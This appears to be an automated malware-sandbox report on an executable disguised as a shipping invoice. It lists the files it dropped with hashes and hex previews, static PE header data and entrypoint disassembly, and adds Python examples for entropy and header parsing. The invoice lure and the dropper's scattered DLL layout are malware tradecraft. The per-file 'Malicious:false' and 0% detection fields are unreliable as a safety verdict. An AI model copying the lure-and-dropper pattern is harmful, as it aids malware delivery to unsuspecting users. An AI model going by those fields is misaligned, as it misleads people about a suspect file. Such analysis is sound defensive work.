                                                                                                                                  SHA1:B960BCB826DA726AB2D919EEF781EE586DF4D607
                                                                                                                                  SHA-256:BA85D3915E513AF98861E7AD82A42E80D957CE52A71463E6E34609C34F3A0E1C
                                                                                                                                  SHA-512:CA23AD61BAEF5E5E96331D7DB2D645D657FB692E4641D364D94F703CDEDDE7C2FCCBBB5939DFA2B43CE07E767F51F6EF72FE1ACE58A6CA47D4DDCCD7B6799443
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <block-list:block-list xmlns:block-list="http://openoffice.org/2001/block-list"><block-list:block block-list:abbreviated-name="BCom"/><block-list:block block-list:abbreviated-name="BCom(Ed)"/><block-list:block block-list:abbreviated-name="BComHons"/><block-list:block block-list:abbreviated-name="BCom(Hons)"/><block-list:block block-list:abbreviated-name="BCompt"/><block-list:block block-list:abbreviated-name="BCur"/><block-list:block block-list:abbreviated-name="BCur(Ed et Adm)"/><block-list:block block-list:abbreviated-name="BCur(I et A)"/><block-list:block block-list:abbreviated-name="BDiac"/><block-list:block block-list:abbreviated-name="BEcon"/><block-list:block block-list:abbreviated-name="BEcon(Ed)"/><block-list:block block-list:abbreviated-name="BEconSc"/><block-list:block block-list:abbreviated-name="BEd"/><block-list:block block-list:abbreviated-name="BEdPh"/><block-list:block block-list:abbreviated-name="BHuish"/><block-list:block block-list:abbreviated-name="BIng"/><block-li
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):18552
                                                                                                                                  Entropy (8bit):6.326879340022009
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:1vh8+o5DhIpvK2HSlajv9J1L/gLCcY9jBJJx+:1JuQ5DgL38TJx+
                                                                                                                                  MD5:0C74A8A66DB361A91A8E46E256234B9D
                                                                                                                                  SHA1:B4EEB6CC71C68264B348824997930426DE1E6C41
                                                                                                                                  SHA-256:245BC780CA69A4B6019625BD1046D7C1C0F4720B795BA2D091AC62B9B7C73DE1
                                                                                                                                  SHA-512:CFBCA14304D8A168944381A139D0299516188C2914F78267CB75C9DB903CB1562BB48E6B540C39C3A9D436180D54B18772C0337C9711808829C20F837C5FEAC9
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                   • Antivirus: Metadefender, Detection: 0%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................O.....O.....O.....A............O.....O.....O.....O.....Rich............................PE..L......B...........!.........................0.....a.........................p..................................... <..}....7..<....P...............2..x....`..t....0...............................6..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (Windows CE) ARM, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2560
                                                                                                                                  Entropy (8bit):2.8091845512006928
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:6gclPCaIZWy+cAcMphg2R5WPWghhrSZP3CE3h:l+EWAAcwCgWPVhrSh3CEx
                                                                                                                                  MD5:BC977F27DB75D9E99EF4733F6603AD0C
                                                                                                                                  SHA1:799BAF9192BDE18BF0B260840FFE5ADA27CD13A3
                                                                                                                                  SHA-256:BEC1776C798A4DCED9C153A9739FADAAC1D80AF11FB652275A6038396C960CA6
                                                                                                                                  SHA-512:748AC90A592760BA02247A4C31786D5BB65414E1465A2EE81B3D658A856CCA94C07EC89F3A24DBEF3208258ED7F6F0DB990126EA6BBE8654D1A87C97D494BE07
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........................PE......3.3C...........!......................................................... .......................................................................................................................................................................rsrc...............................@..@.................................................... .......8...................?...P.......................h...................................................,.................................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................*.'.....*.'.?.................................S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.4.0.9.0.4.B.0...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...l."...F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....V.S.D. .e.m.b.e.d.d.e.d. .j.i.t. .d.e.b.u.g.g.e.r. .S.t.r.i.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse53A7.tmp
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):657776
                                                                                                                                  Entropy (8bit):6.748405173068804
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:sGgbmgcb04MKJuQxUSw4YNXdJvE/qwakLvDupEScr2d0:TlgcxrJuQ/TCtAqbpHc6d0
                                                                                                                                  MD5:393215B51E4C54A6950B13796ABEA20F
                                                                                                                                  SHA1:77225F7A62F29560C7087176E187ED2012E0A25E
                                                                                                                                  SHA-256:DA2F2572CCA884673B95FF9DD3C8BDF4598240F45F5206F110DF99EC6289EECA
                                                                                                                                  SHA-512:C48A8C603B18790E83A19BAAFA7B5C1443C48163AA84D0CDCD3142F48C84DF971C0EAC8DA6B28F724B167C06E3B439E87A8DD116032701975CB691BF140CE96F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: .i......,.......,........#......X]......uh.......i......................................................*.......................................................................................................................................................................................................j.......................3...............................................................................................................*...............3...............................................................3.......................................g...............................................................j...............................................................................................................................f.......................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):16896
                                                                                                                                  Entropy (8bit):3.838968174263835
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:7YndHVTZZip3YBq2nieYqHAAUsJ3M3IDLbKDnbNWcuTWN:EdHVnG38DieFHcsJcYDL2DnpWbTW
                                                                                                                                  MD5:585AC8F0CA13C1326C5E562B509B8E2D
                                                                                                                                  SHA1:B884490E95CEBA559E50E48F22E810D9E5925792
                                                                                                                                  SHA-256:5551259AE036773BB93168503FE1BA75EA2E5718C02172FDCAE6E20B4B80CA25
                                                                                                                                  SHA-512:88E734E475D3A6A721E18B9FB1E80231CA81509C6B20B9927DDE5A1F16D69FE118C56A1EDC655E492D6388037AE748E39D9A3FE8E4F957BC83703F18A2E5E237
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....3C...........!.........>....................F[.........................p.......I............................................... ..$9...................`.......................................................................................text...p...........................@..@.rsrc...$9... ...:..................@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\number.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):134
                                                                                                                                  Entropy (8bit):4.544675981202402
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:vFWWMNCmVijhGOjaESwJFBngKbWJkZGWGOjaESydZMqgKbWJRqT:TM3VijhGif0KykZGWGiJuTKyET
                                                                                                                                  MD5:A75CA31F7ED72AF18B51615986EDA289
                                                                                                                                  SHA1:59CD60370C065551CC3B3EFEF5901B76DE930771
                                                                                                                                  SHA-256:4C2CE6779620133C87EC716FA06DA2A3A9EA97862AC0B7AC1051B474573EE93E
                                                                                                                                  SHA-512:3BE3A461AFE5B0527719A1F1103BD0CB836C8F4340DB5192C99BF0121C9F3D3F9ECB0127E6C82F1FF830E297AF54199706671053CC6BE4CC91C29F6180C96010
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version='1.0'?>..<data>...<circle>....<radius>12</radius>...</circle>...<circle>....<radius>37.5</radius>...</circle>..</data>

                                                                                                                                   C:\Users\user\AppData\Roaming\panel\box\xbox\67.opends60.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):47
                                                                                                                                  Entropy (8bit):3.9953502875256306
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:p/uBallM/lErm1F:RcasDP
                                                                                                                                  MD5:E4E4F671BDE80749EA2EB465FDA2568D
                                                                                                                                  SHA1:5CA98566B46E8BC5538399CB05F85A8F41DDE61F
                                                                                                                                  SHA-256:82F834504F7C6FCE706E28083E8A93F52A61A84918B0CDCBDC0B1A70B505B1D1
                                                                                                                                  SHA-512:61E8CED4EE21CED48F0D4FBCCE3CCC35546DBAFB6B6C63A73503205740830BA11452E44A668AEE123F72A1C75499B5F9A270E85B56BF782EA79A4D695EEDAA08
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ......L....9....)..._srv_senddone.opends60.dll.

                                                                                                                                   C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6144
                                                                                                                                  Entropy (8bit):4.623117599850433
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:K1DJcZB62DHzW6st3+K9XEWCPCNjaqNyyWPV:K1dIH1sD6WCKNjaMyyWN
                                                                                                                                  MD5:743B7D073C1BFB883B9F97CA1D5DDF94
                                                                                                                                  SHA1:01AFEC884E6B5D1CA5ECCB47E18C52CFF44882FA
                                                                                                                                  SHA-256:1A0E9EC2FD53F7D0CE83BF4745D44681412724250046F0A88C54A630EE5A9A59
                                                                                                                                  SHA-512:5947FC4DC66F476289EECA57E7D2CB0766528602DA8C124C62A544ACC4DDD38944B15ECFE9651A74764379797A5B782975DC7949EC37A3C6E6757E5477502979
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:..L:..L:...B..L:.Rich.L:.........PE..L...P.3C...........!.........................................................@.......b.......................................................................0.......................................................................................rsrc...............................@..@.reloc.......0......................@..B................H...(.......@.......h...................................................X...................................................................................................................................(.......................8...`...V...............h........... ...(...........H...*...........x.................C.T.M.E.N.U...........CFCT............r...T........,?.2...cvw.y............................h..y..w........wxw.w.y..ww.........................................

                                                                                                                                   C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5120
                                                                                                                                  Entropy (8bit):3.152590437417521
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:KqiJ6OqhgmLwQpXMbqwcI65y7+OiaC+IZWo6zqhpm3F5WPWghnpgX:jOqhiZF6zSEWEOjWPVn0
                                                                                                                                  MD5:CC869C04E8771D08397DC86374FE5A5E
                                                                                                                                  SHA1:D7CD17B9607538DCDD6FC267EE504B37740992FF
                                                                                                                                  SHA-256:420007C3E0A76AC880679F323653D3B9321832F578CA4DC1C2A1E5775A0F77DD
                                                                                                                                  SHA-512:684114317AB54248D20727058F58E592CFFEE865E876B8155C4426EE71CF15BFACAEE07E2C9EF49C8D3F99CF6F0E20AE8800D2DF88F0550E5304AB39BA468EF4
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L...K.3C...........!...............................[.........................@......G................................................ .......................0.......................................................................................text...q...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                   C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46784
                                                                                                                                  Entropy (8bit):6.38572528005874
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:iiLuedE09FC5Ja5gR/2hyzsiPKxUd+0PpOmMKbfZD8L3d/o+/j:iiLu+LsjPR/2AzsiP3+KOmdbfZD8R/ou
                                                                                                                                  MD5:2483FFB732EFA8A92F6A78B4E97C07EA
                                                                                                                                  SHA1:4929D6076B400EB8C92D941E7C2898FEF282094D
                                                                                                                                  SHA-256:8713626CFB6493E4905448C96BEA3F77C0A05876208B3F87BF95D13166D53A70
                                                                                                                                  SHA-512:F71E5DBB2F985DCD7A0CB1C14D602A05964F15D6E32A859FA48710EB34AF9540448A86E27AD0E0BF3136465C6C142BCC473F74C215B248F07E8C641AF168FDE2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q.y...*...*...*...*...*...*...*...*...*...*...*G..*...*...*...*...*...*...*...*...*...*...*...*...*...*...*...*Rich...*........PE..L.....3C.................v..."......df............@.............................................. ...........................z......................................@...............................@...@............................................text....u.......v.................. ..`.data...,............z..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                   C:\Users\user\AppData\Roaming\pkgs\x-lz4.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1953
                                                                                                                                  Entropy (8bit):5.19612754901248
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cFQHd6hH3nRBS46jdeBOfGguEeB5NCgZ2clMfeBtIQxq3vQjS/LMSkPYF:e13nRBSDheBOfGguEeBPCgZ2clMWBtIP
                                                                                                                                  MD5:D36051864C2DB5D4112463629F26A091
                                                                                                                                  SHA1:24BF1CC82EBBCCFEE903A0F11E45D40D8F93BF0E
                                                                                                                                  SHA-256:E0B10A6875F8FAB58C1E9C58900CB5363DD7ABFC5921C9FBC67D5A12212E7B5F
                                                                                                                                  SHA-512:0F21BEA6ED7EA348E295FD551400F1928407C635077B7457C02B089D0C6B215DE818BFE2D7A5796DB82512EF8F4A91B053A60303A6737FC3872ACE861D8F83C3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/x-lz4">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>LZ4 archive</comment>. <comment xml:lang="ca">arxiu LZ4</comment>. <comment xml:lang="cs">archiv LZ4</comment>. <comment xml:lang="da">LZ4-arkiv</comment>. <comment xml:lang="de">LZ4-Archiv</comment>. <comment xml:lang="el">........... ...... LZ4</comment>. <comment xml:lang="en_GB">LZ4 archive</comment>. <comment xml:lang="es">archivador LZ4</comment>. <comment xml:lang="eu">LZ4 artxiboa</comment>. <comment xml:lang="fi">LZ4-arkisto</comment>. <comment xml:lang="fr">archive LZ4</comment>. <comment xml:lang="ga">Cartlann LZ4</comment>. <comment xml:lang="gl">Arquivo LZ4</comment>. <comment xml:lang="he">...... LZ4</comment>. <comment xml:lang="hr">LZ4 arhiva</comment>. <comment xml:lang="hu">LZ4 arch.vum</comment>. <comment xml:lang
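
The Entropy (8bit) and hash fields printed for every dropped file above are simple to reproduce, and reproducing them is the usual first check when a report's figures are questioned. The following Python script is an added example, not part of this report and not Joe Sandbox's own code: it computes the same size, entropy and hash fields with the standard library and adds a per-window entropy profile, which is what a practitioner runs to find where a compressed or encrypted blob sits inside an otherwise low-entropy file. The 7.2 bits-per-byte packing threshold is a conventional heuristic assumed for the example, and the input built by build_sample() is constructed, not data from the analysed sample.

```python
import hashlib
import math
import random
from collections import Counter

# Conventional heuristic (an assumption, not a fixed rule): sustained entropy above
# ~7.2 bits/byte usually means compressed or encrypted data rather than code or text.
PACKED_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for one repeated byte, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_summary(data: bytes) -> dict:
    """The per-file fields a sandbox report prints: size, entropy and the usual hash set."""
    entropy = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": entropy,
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
        "likely_packed": entropy >= PACKED_THRESHOLD,
    }


def entropy_profile(data: bytes, window: int = 1024) -> list:
    """(offset, entropy) for each fixed-size window: whole-file entropy hides where a
    high-entropy blob sits, a windowed profile shows it."""
    return [(off, shannon_entropy(data[off:off + window])) for off in range(0, len(data), window)]


def build_sample() -> bytes:
    """Constructed input: 2048 bytes of repetitive text (a stand-in for a loader stub)
    followed by 4096 pseudo-random bytes (a stand-in for a compressed payload)."""
    rng = random.Random(1)                      # fixed seed so results are reproducible
    stub = (b"This program cannot be run in DOS mode.\r\n" * 60)[:2048]
    payload = bytes(rng.randrange(256) for _ in range(4096))
    return stub + payload
```

Run file_summary() on any of the dropped files to compare against the fields above; the first two windows of entropy_profile(build_sample()) sit around 4 bits/byte and the last four near 8, which is the shape to expect from an installer stub carrying a compressed payload. The submitted file's own entropy of 7.878 (Static File Info below) is typical of a Nullsoft self-extracting archive: the stub is ordinary code, but the compressed archive it carries dominates the byte distribution, so the single whole-file number says little about the stub itself.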

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):7.87849220099009
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File size:438107
                                                                                                                                  MD5:579ba39b6a146080ef6481591440e445
                                                                                                                                  SHA1:06bfc3b47e1ad6a35e10cb4a1edee6c563710107
                                                                                                                                  SHA256:d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
                                                                                                                                  SHA512:bc2c920da35971ea6a6dfa8fc4f49829d6ba1eeae9589207b1f77a6e5f66d66dcb87396aadce266a61652f6fdfbe40503b9183af5f5ce26fa6cc9218df1597b9
                                                                                                                                  SSDEEP:12288:GanGnRPRnPSuPSw4YxX/Jva/qw0kLvDBZNC1J:8PhS7T8v+kW2J
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................f...|.......3............@

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:90c8e472b85c261a

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x4033a9
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                  Time Stamp:0x5DF6D4F7 [Mon Dec 16 00:51:03 2019 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:7c2c71dfce9a27650634dc8b1ca03bf0
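
Every field in the table above (entrypoint, image base, subsystem, time stamp, the two characteristics bit-fields) and the RVA-to-section mapping in the Data Directories table are read directly from the COFF header, the PE32 optional header and the section table. The parser below is an added example written for this page, not the report's own tooling, and uses only the Python standard library. Besides decoding the fields it flags one inconsistency this sample shows: DYNAMIC_BASE is set in the DLL characteristics, but RELOCS_STRIPPED is set and the BASERELOC directory is empty, so the loader has no relocation data, cannot move the image, and maps it at its ImageBase of 0x400000 regardless of the ASLR opt-in. The image returned by build_sample_pe() is a constructed header-only PE carrying the values listed in this report; its section layout is an assumption made for the example.

```python
import struct
from datetime import datetime, timezone

# Flag names from the PE/COFF specification (the subset this report prints).
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}
# Index 7 is ARCHITECTURE in the spec; the report labels it COPYRIGHT, so that name is kept here.
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
                   "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
                   "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def set_bits(value: int, table: dict) -> list:
    """Names of the flags set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32_headers(data: bytes) -> dict:
    """Read the COFF header, PE32 optional header, data directories and section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                   # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    sections = []
    for i in range(nsections):                        # 40-byte section headers follow the optional header
        name, vsize, vaddr = struct.unpack_from("<8sII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii"), vaddr, vsize))

    def section_of(rva: int) -> str:
        for name, va, vsize in sections:
            if va <= rva < va + vsize:
                return name
        return ""

    directories = []
    for i in range(min(ndirs, 16)):                   # 8-byte (RVA, size) pairs start at offset 96
        rva, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        directories.append((DIRECTORY_NAMES[i], rva, size, section_of(rva) if rva else ""))
    file_flags = set_bits(chars, FILE_CHARACTERISTICS)
    dll_flags = set_bits(dll_chars, DLL_CHARACTERISTICS)
    has_relocs = "RELOCS_STRIPPED" not in file_flags and len(directories) > 5 and directories[5][2] > 0
    return {
        "entrypoint": image_base + entry_rva,
        "entrypoint_section": section_of(entry_rva),
        "image_base": image_base,
        "timestamp": datetime.fromtimestamp(timestamp, timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC"),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "file_characteristics": file_flags,
        "dll_characteristics": dll_flags,
        "directories": directories,
        # DYNAMIC_BASE only opts in to ASLR; with no relocation data the loader
        # cannot move the image, so it is mapped at image_base regardless.
        "aslr_effective": "DYNAMIC_BASE" in dll_flags and has_relocs,
    }


def build_sample_pe() -> bytes:
    """Constructed header-only PE32 carrying the values this report lists for the sample.
    The section layout is an assumption made for the example."""
    sections = [(b".text", 0x1000, 0x6000), (b".rdata", 0x8000, 0x1000),
                (b".data", 0x9000, 0x27000), (b".rsrc", 0x3F000, 0x4340)]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x5DF6D4F7, 0, 0, 224, 0x010F)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, 0x33A9)                    # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)                  # ImageBase
    struct.pack_into("<HH", opt, 68, 2, 0x8540)                # WINDOWS_GUI, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x853C, 0xA0)     # IMPORT directory
    struct.pack_into("<II", opt, 96 + 8 * 2, 0x3F000, 0x4340)  # RESOURCE directory
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, 0, 0, 0, 0, 0, 0, 0)
                     for n, va, vs in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
```

parse_pe32_headers(build_sample_pe()) yields entrypoint 0x4033a9 in .text, the time stamp Mon Dec 16 00:51:03 2019 UTC, the same two flag lists the report prints, IMPORT resolved to .rdata and RESOURCE to .rsrc, and aslr_effective False. Compiler time stamps are attacker-controlled, so treat the December 2019 value as a claim to correlate with the Rich header and the dropped-file timestamps, not as a fact.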

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  sub esp, 00000184h
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  xor ebx, ebx
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+18h], ebx
                                                                                                                                  mov dword ptr [esp+10h], 0040A130h
                                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                  cmp ax, 00000006h
                                                                                                                                  mov dword ptr [0042F42Ch], eax
                                                                                                                                  je 00007F43E0572AA3h
                                                                                                                                  push ebx
                                                                                                                                  call 00007F43E0575BA3h
                                                                                                                                  cmp eax, ebx
                                                                                                                                  je 00007F43E0572A99h
                                                                                                                                  push 00000C00h
                                                                                                                                  call eax
                                                                                                                                  mov esi, 00408298h
                                                                                                                                  push esi
                                                                                                                                  call 00007F43E0575B1Fh
                                                                                                                                  push esi
                                                                                                                                  call dword ptr [004080A0h]
                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                  cmp byte ptr [esi], bl
                                                                                                                                  jne 00007F43E0572A7Dh
                                                                                                                                  push 0000000Ah
                                                                                                                                  call 00007F43E0575B77h
                                                                                                                                  push 00000008h
                                                                                                                                  call 00007F43E0575B70h
                                                                                                                                  push 00000006h
                                                                                                                                  mov dword ptr [0042F424h], eax
                                                                                                                                  call 00007F43E0575B64h
                                                                                                                                  cmp eax, ebx
                                                                                                                                  je 00007F43E0572AA1h
                                                                                                                                  push 0000001Eh
                                                                                                                                  call eax
                                                                                                                                  test eax, eax
                                                                                                                                  je 00007F43E0572A99h
                                                                                                                                  or byte ptr [0042F42Fh], 00000040h
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [00408040h]
                                                                                                                                  push ebx
                                                                                                                                  call dword ptr [00408284h]
                                                                                                                                  mov dword ptr [0042F4F8h], eax
                                                                                                                                  push ebx
                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                  push 00000160h
                                                                                                                                  push eax
                                                                                                                                  push ebx
                                                                                                                                  push 00429858h
                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                  push 0040A1ECh

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x853c           0xa0          .rdata
